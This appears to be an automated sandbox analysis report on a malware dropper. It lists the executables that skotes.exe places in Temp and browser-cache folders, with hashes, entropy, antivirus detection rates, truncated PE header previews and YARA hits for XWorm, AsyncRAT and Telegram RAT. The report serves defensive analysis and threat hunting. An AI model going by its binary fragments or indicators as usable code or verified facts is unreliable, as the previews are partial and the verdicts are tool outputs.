MD5:	AFD936E441BF5CBDB858E96833CC6ED3
SHA1:	3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
SHA-256:	C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
SHA-512:	928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\RzAAR0y[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1101736
Entropy (8bit):	5.837226529529882
Encrypted:	false
SSDEEP:	24576:/EMmu7v69wBqAqcm5yf7k+GB3YYHd0UMmw0HikcW1NxVPtb/NJqQyBBSGUGASYk3:/EM97vYwBqAqcayf7k+GZYYHd0UMmw0U
MD5:	A732362B415CD62F07D30DB89E742C85
SHA1:	B0D090B702BF006BA020488298180E107810164A
SHA-256:	E0BA6D52473E2FAAEE92F61E2F187829FE312539F4ADF8CF1CC7E955FCDFD400
SHA-512:	570F89D29B3D2F266E6F28D227F88ADEDEFBC2D45420C14FCBE10166D07E5F7B88EF740388DE9480BBD3CD4A1E2DF3CCEB2B300ACBDC12CBB60C38F884D1E19D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s."X..qX..qX..qQj0qR..qI..pZ..qI..p[..qI..pQ..qI..pN..qX..q...qX..qT..q..pY..qRichX..q........................PE..d.....dg.........."....*.......................@....................................'.....`.................................................<...................................$....z..T....................{..(...py..@............................................text............................... ..`.rdata..R...........................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4451328
Entropy (8bit):	7.989186024729904
Encrypted:	false
SSDEEP:	98304:wULHW/9XyrNfL1FG3J+hSCodi5cKv7o/D+mzfETgkfAzmf/uW9:DL2/Vy1L8+4Co9/dzETSzSD
MD5:	0121D24D5F6392439A1D49C2904595E1
SHA1:	E01FA6B2601FCA3CD127B7D9048319C088E6B6EE
SHA-256:	A47EDDF45C659395E694138FF56FC4F01FC9E66DF4E0150B14DA37C1A9AB4DE6
SHA-512:	852C11CDE17D6D4DE9D0395C3CA77512DF6AAF09C85A1AC984731FCAA5BB25BE2E71C494010721356971BC62E3798D10FB3BB3ED3A62C2EE65FE6B887BB45220
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...`.......pH...@...................................C...@... ............................._pt.s....`t..................... A...............................@...................................................... . .Pt......L(.................@....rsrc........`t......\(.............@....idata .....pt......^(.............@... .`8...t......`(.............@...hkbprtow.p......d...b(.............@...nzqpevfi.....P........C.............@....taggant.0...`..."....C.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.338206717136569
Encrypted:	false
SSDEEP:	384:78HIRrJs1HLBDhq5RWBNBlBThtq2uoyLizwxeNLHdWuNMV275RtAcL8SFS69rvwM:Qqls1HLBDhIRWbXlq2uVk75RuSFSm6EJ
MD5:	04F57C6FB2B2CD8DCC4B38E4A93D4366
SHA1:	61770495AA18D480F70B654D1F57998E5BD8C885
SHA-256:	51E4D0CBC184B8ABFA6D84E219317CF81BD542286A7CC602C87EB703A39627C2
SHA-512:	53F95E98A5ECA472ED6B1DFD6FECD1E28EA66967A1B3AA109FE911DBB935F1ABF327438D4B2FE72CF7A0201281E9F56F4548F965B96E3916B9142257627E6CCD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 57%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.7..........."...0..L...........j... ........@.. ....................................`.................................<j..O....................................i..8............................................ ............... ..H............text....J... ...L.................. ..`.rsrc................N..............@..@.reloc...............T..............@..B................pj......H.......(7...2...........................................................0..8.......s/.....(....} .....}!.....}.....\| .....(...+.\| ...(.....0..P........~.........,B.r...p(.....r...p(.....(.....r...p.(....(......(....o......(.......0..8.......s2.....(....}(.....}).....}'....\|(.....(...+.\|(...(.....0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+....0............r...p( ...o!....+.....0............r...p( ...o!....+.....0..2.........r...pr...p

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[3].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1887232
Entropy (8bit):	7.947645167072717
Encrypted:	false
SSDEEP:	49152:O1lWP0x/0lez2uNV2Y5y+M14fFwaYNsPt+aeJTiH:Icka2zuaMmaJ
MD5:	02A689D922E4CB98E6FB5D9AE4A026E1
SHA1:	6F18B7EBF4F097E697F4EC0B2293475CD0242E8F
SHA-256:	7F3742A82536E9BD588785C351A7B18653ECC783C3CD2DD9B9CA30834B247C34
SHA-512:	60A110D5955B510D510EEB556D2CD1556FF50D2B95EF9B10FAD8F824277E64AF8E9A082E88E5CA7ED2F9571815FDAADBC404D99BAB2EB3DFA1847DCCF40CDCD1
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................PJ...........@...........................J...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...gghkcrho.P..../..H...^..............@...phbqiwyh.....@J.....................@....taggant.0...PJ.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[4].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1114112
Entropy (8bit):	7.7336985855739355
Encrypted:	false
SSDEEP:	24576:FAu2uOTJr0/sBIpMvVEDvtNNVpk3BLSx+ptEH76duCiheu2:4ugJAGIpMmZNNEBLSx4EHGxiC
MD5:	EF08A45833A7D881C90DED1952F96CB4
SHA1:	F04AEEB63A1409BD916558D2C40FAB8A5ED8168B
SHA-256:	33C236DC81AF2A47D595731D6FA47269B2874B281152530FDFFDDA9CBEB3B501
SHA-512:	74E84F710C90121527F06D453E9286910F2E8B6AC09D2AEB4AB1F0EAD23EA9B410C5D1074D8BC759BC3E766B5BC77D156756C7DF093BA94093107393290CED97
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.cg..............0......2........... ........@.. .......................`............@.....................................W.......H/...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H/.......0..................@..@.reloc.......@......................@..B........................H........<..........K.......`p...........................................Y?.F60...5..8....4zc.:.V........N.0...1.....O*.S..~.......I...pR..iI......Pn}...iJ!BH.+o/S..yj...8T'.}....y.I.kD.....'....$.6....}..w[. )...j..[.-..0....\|...p....h\..L....R.T.~......b.K.h....".8.s`)...1... ....[i&.9....a?.F..N..~..._.^...Q.....43.L.....@v...x..IB.4...........\|......(........~.Y.L.S..;..x.)w...v...:..2.....y.%{3w.)..^..7......@...7..k.H..p}."..%.p....0.g.3....g..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1863680
Entropy (8bit):	7.947727721324286
Encrypted:	false
SSDEEP:	49152:b0iMcVeC2k+eFGF2uX6zTTIudd8Cshc5:oi5zTop63rLW
MD5:	27C1F96D7E1B72B6817B6EFEFF037F90
SHA1:	2972CC112FC7E20CBF5952ABE07407B8C1FBB2A2
SHA-256:	AEC3EC473DE321D123E939985579227EE62B53B3B3EDB7AB96E2A66C17E9696D
SHA-512:	9A31DC9945889D35AEA8710DF2F42806C72C422B7B5F4AA8ACBA6986CBD9EA6A49181A41A50EE21CCBED86CBFF87C98A742E681AC3F6A87E2BD4436C9112EB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................pI...........@...........................I.....2.....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... .0*..@.......\..............@...lzigcvvj.....p/......^..............@...pdsqmwos.....`I......J..............@....taggant.0...pI.."...N..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1916416
Entropy (8bit):	7.940600827234037
Encrypted:	false
SSDEEP:	49152:S9WKusfT3Tdacs2qoFtgPRkXjjiy99LZIQtgad1Aoi6:RsrT/coF8gvl9996afA7
MD5:	FCC660D15800AE9E2EE9EF335805414F
SHA1:	4FB9EB7BCCFD8FD42E38EC43A94A524A85B5E169
SHA-256:	02C9A35216A7AEA10E017D37F1B0C30F59AD6E3D9E379091402946BEC0A34FDF
SHA-512:	3458054376F0B9AE0C7540FE7C4ED125246D9F17D0966B80BFCC435557BD450C591E9E223511E96E61A8B2F77FBC41FDF154DE86F23614A96C40F0A78A2A533E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................@....................@..................................1......................................[.A.o.....@.....................................................P....................................................... . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..(...A.....................@...gptxkuce.P...0j..F..................@...tnohnhsw............................@....taggant.0......."..................@...........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[3].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2772480
Entropy (8bit):	6.4841504233005125
Encrypted:	false
SSDEEP:	49152:blungQMjbL+vaYwdHmInng7QrGd14H8bjpWyT:blung53xmInnSrd14HAT
MD5:	EA5DCACA8142A4A921DB2D5C042B4490
SHA1:	522B4CCC114E2DA5C255EDFEA6239A9784DABF47
SHA-256:	FD43D2DCBE5EB2783E68C361FF50A96FD3BCF518FE4E7DC1A38CBD57B775E7E0
SHA-512:	59155CD42E5A56BDE0F484E207928F37999BB3072F3D107E9BA40C52A5D47874078F8821125035F0483294C643EF843D7932529F62D24F1CC0088D0E57ECEEAA
Malicious:	true
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. ..............................6+...`.................................U...i....`..D........................................................................................................... . .@... ...@... ..............@....rsrc...D....`.......`..............@....idata . ...........f..............@...tniryivd..).......)..h..............@...nnokcvcq. ...`......(.............@....taggant.@......"...,.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	5.956916783358023
Encrypted:	false
SSDEEP:	1536:tovw+k9MVwKKtX8nL1hskkwOmCBbuyypy3qDT+YsR6JqgBSO88RQTCbPIc:2nFwKKKnYkdfkbuy76DTGo8Ov6ebN
MD5:	07E410214A2AEB8F577E407154252F3C
SHA1:	697FAC558B66C0476C3F04D80764FA75EB6DE77D
SHA-256:	12E340E551ABBF8A61A6DD73D45C94E88AA217CEAE070BA0748360D24C706114
SHA-512:	470B208122D6177E4635038418E4966A63725C7F9B21B4D41F3C89B953BAE9A23E141424B358110DE3A8D1624C125224A7471BB44EF7039C313D03E844A20ECC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....eg.................V..........nt... ........@.. ....................................@..................................t..O.................................................................................... ............... ..H............text...tT... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B................Pt......H.......4t..........&.....................................................(.....r...p. ,-....(.....r!..p. ~.H..s.........s.........s.........s..........r...p. X....r...p. `...r...p. .....r...p. ....r[..p..((....r...p. P4...r@..p. ..e..(,...-.(-...,.+.(....,.+.(+...,.+.(...,..(d..."(....+."(....+.&(F...&+..+5sq... .... .'..or...(,...~....-.(e...(W...~....os...&.-..r...p. r.d..r...p.rH..p. y/...r...p. e....r...p. #,...r...p. &G...rX..p*.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2338304
Entropy (8bit):	7.9524587171879535
Encrypted:	false
SSDEEP:	49152:slVPyzrcZkW871u0IfjGeAAorxRSGRytfTS2ySHL:KP8cZXjGeMjyVyg
MD5:	F16E098C7EFAD8AB0B6E62C428E7E649
SHA1:	41635332C48223CCE103C525CD20DE2F7B406EC1
SHA-256:	80D350925848EFA44940F6893BC5CD278B3C0A9B3CA6F6177D3E52A69300161B
SHA-512:	66B47E00F7CD2BD7FB43CE39469617EB78EF64139DAD766AC41CB75EADCE5BD1787F4847248EB66A5E5507D467354A0DCA83641E310ADC5B492BB3FE9C0C835A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...-.dg.........."....).....l........a........@.............................0a.......#...`.................................................h...\|....p...... .`.D"..b.^.H$.......................................................................................... . .`..........................@....rsrc........p.......&..............@....idata .............,..............@... ..:.........................@...omdapsrn.@!...?..6!..0..............@...ehlcdwxw......`......f#.............@....pdata.I.0....`..$...h#.............@..@.taggant.0....a.."....#.............@...........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1101736
Entropy (8bit):	5.837226529529882
Encrypted:	false
SSDEEP:	24576:/EMmu7v69wBqAqcm5yf7k+GB3YYHd0UMmw0HikcW1NxVPtb/NJqQyBBSGUGASYk3:/EM97vYwBqAqcayf7k+GZYYHd0UMmw0U
MD5:	A732362B415CD62F07D30DB89E742C85
SHA1:	B0D090B702BF006BA020488298180E107810164A
SHA-256:	E0BA6D52473E2FAAEE92F61E2F187829FE312539F4ADF8CF1CC7E955FCDFD400
SHA-512:	570F89D29B3D2F266E6F28D227F88ADEDEFBC2D45420C14FCBE10166D07E5F7B88EF740388DE9480BBD3CD4A1E2DF3CCEB2B300ACBDC12CBB60C38F884D1E19D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s."X..qX..qX..qQj0qR..qI..pZ..qI..p[..qI..pQ..qI..pN..qX..q...qX..qT..q..pY..qRichX..q........................PE..d.....dg.........."....*.......................@....................................'.....`.................................................<...................................$....z..T....................{..(...py..@............................................text............................... ..`.rdata..R...........................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4438776
Entropy (8bit):	7.99505709582503
Encrypted:	true
SSDEEP:	98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
MD5:	3A425626CBD40345F5B8DDDD6B2B9EFA
SHA1:	7B50E108E293E54C15DCE816552356F424EEA97A
SHA-256:	BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
SHA-512:	A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...\|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	5.956916783358023
Encrypted:	false
SSDEEP:	1536:tovw+k9MVwKKtX8nL1hskkwOmCBbuyypy3qDT+YsR6JqgBSO88RQTCbPIc:2nFwKKKnYkdfkbuy76DTGo8Ov6ebN
MD5:	07E410214A2AEB8F577E407154252F3C
SHA1:	697FAC558B66C0476C3F04D80764FA75EB6DE77D
SHA-256:	12E340E551ABBF8A61A6DD73D45C94E88AA217CEAE070BA0748360D24C706114
SHA-512:	470B208122D6177E4635038418E4966A63725C7F9B21B4D41F3C89B953BAE9A23E141424B358110DE3A8D1624C125224A7471BB44EF7039C313D03E844A20ECC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....eg.................V..........nt... ........@.. ....................................@..................................t..O.................................................................................... ............... ..H............text...tT... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B................Pt......H.......4t..........&.....................................................(.....r...p. ,-....(.....r!..p. ~.H..s.........s.........s.........s..........r...p. X....r...p. `...r...p. .....r...p. ....r[..p..((....r...p. P4...r@..p. ..e..(,...-.(-...,.+.(....,.+.(+...,.+.(...,..(d..."(....+."(....+.&(F...&+..+5sq... .... .'..or...(,...~....-.(e...(W...~....os...&.-..r...p. r.d..r...p.rH..p. y/...r...p. e....r...p. #,...r...p. &G...rX..p*.

C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	863093
Entropy (8bit):	7.96744840145825
Encrypted:	false
SSDEEP:	24576:qWryjPGki4+5vfHU3fYFy664hRvRKMU+Et:1+FQVUPA/v8MhQ
MD5:	8EB4F92605E35C57A42B0917C221D65C
SHA1:	0E64D77EF1B917B3AFE512B49710250C71369175
SHA-256:	B57D78D93F74F7AE840AB03D3FDA4F22A24AD35AFCF9A53128CF82A92A67A085
SHA-512:	4CC5DB426C8DE3D7AFDCFA26440D5BD9A885F5148E4307B8D04C5D56C96672D5C82ED9989BF346CE7AECEA07D980735C46A930B885F824BA53738AC76DBB05BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p............@.................................@............R...............$...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc....R.......T..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4451328
Entropy (8bit):	7.989186024729904
Encrypted:	false
SSDEEP:	98304:wULHW/9XyrNfL1FG3J+hSCodi5cKv7o/D+mzfETgkfAzmf/uW9:DL2/Vy1L8+4Co9/dzETSzSD
MD5:	0121D24D5F6392439A1D49C2904595E1
SHA1:	E01FA6B2601FCA3CD127B7D9048319C088E6B6EE
SHA-256:	A47EDDF45C659395E694138FF56FC4F01FC9E66DF4E0150B14DA37C1A9AB4DE6
SHA-512:	852C11CDE17D6D4DE9D0395C3CA77512DF6AAF09C85A1AC984731FCAA5BB25BE2E71C494010721356971BC62E3798D10FB3BB3ED3A62C2EE65FE6B887BB45220
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...`.......pH...@...................................C...@... ............................._pt.s....`t..................... A...............................@...................................................... . .Pt......L(.................@....rsrc........`t......\(.............@....idata .....pt......^(.............@... .`8...t......`(.............@...hkbprtow.p......d...b(.............@...nzqpevfi.....P........C.............@....taggant.0...`..."....C.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1863680
Entropy (8bit):	7.947727721324286
Encrypted:	false
SSDEEP:	49152:b0iMcVeC2k+eFGF2uX6zTTIudd8Cshc5:oi5zTop63rLW
MD5:	27C1F96D7E1B72B6817B6EFEFF037F90
SHA1:	2972CC112FC7E20CBF5952ABE07407B8C1FBB2A2
SHA-256:	AEC3EC473DE321D123E939985579227EE62B53B3B3EDB7AB96E2A66C17E9696D
SHA-512:	9A31DC9945889D35AEA8710DF2F42806C72C422B7B5F4AA8ACBA6986CBD9EA6A49181A41A50EE21CCBED86CBFF87C98A742E681AC3F6A87E2BD4436C9112EB32
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................pI...........@...........................I.....2.....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... .0*..@.......\..............@...lzigcvvj.....p/......^..............@...pdsqmwos.....`I......J..............@....taggant.0...pI.."...N..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	776832
Entropy (8bit):	7.859727158445845
Encrypted:	false
SSDEEP:	12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
MD5:	AFD936E441BF5CBDB858E96833CC6ED3
SHA1:	3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
SHA-256:	C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
SHA-512:	928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.338206717136569
Encrypted:	false
SSDEEP:	384:78HIRrJs1HLBDhq5RWBNBlBThtq2uoyLizwxeNLHdWuNMV275RtAcL8SFS69rvwM:Qqls1HLBDhIRWbXlq2uVk75RuSFSm6EJ
MD5:	04F57C6FB2B2CD8DCC4B38E4A93D4366
SHA1:	61770495AA18D480F70B654D1F57998E5BD8C885
SHA-256:	51E4D0CBC184B8ABFA6D84E219317CF81BD542286A7CC602C87EB703A39627C2
